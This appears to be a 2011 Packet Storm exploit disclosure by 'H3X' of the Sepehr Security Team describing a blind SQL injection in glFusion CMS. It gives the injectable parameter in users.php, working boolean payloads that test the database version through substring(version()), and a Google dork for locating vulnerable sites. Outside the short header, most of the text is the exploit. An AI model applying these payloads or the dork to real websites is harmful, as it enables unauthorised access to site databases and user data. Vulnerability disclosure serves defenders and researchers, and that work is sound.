glFusion CMS Blind SQL Injection

2011-02-25T00:00:00
ID PACKETSTORM:98731
Type packetstorm
Reporter H3X
Modified 2011-02-25T00:00:00

Description

                                        
                                            `= == === ====== == == == ==== === ==== ==== ==== === ==== === ====  
[glFusion CMS Blind SQL injection Vulnerability]  
= == === ====== == == == ==== === ==== ==== ==== === ==== === ====  
  
#Author:H3X  
#Cradit:Sepehr Security Team  
#Reference:  
#Product:glFusion CMS  
#google Dork:"Powered by glFusion CMS"   
#Vulnerable Version: all version  
#Vulnerability Type:Blind SQL Injection  
#Date:start[2011-02-25]  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[Vulnerability Details]  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
#Exploit:  
/users.php?mode=[Blind_SQL_injection_here]  
  
#Example:  
/users.php?mode=1 and substring(version(),1,1)=4 // false  
/users.php?mode=1 and substring(version(),1,1)=5 // true  
  
= == === ====== == == == ==== === ==== ==== ==== === ==== === ====  
Greetz:thE_knight & Einstein & Wizard  
our site :http://www.sepehr-team.org  
`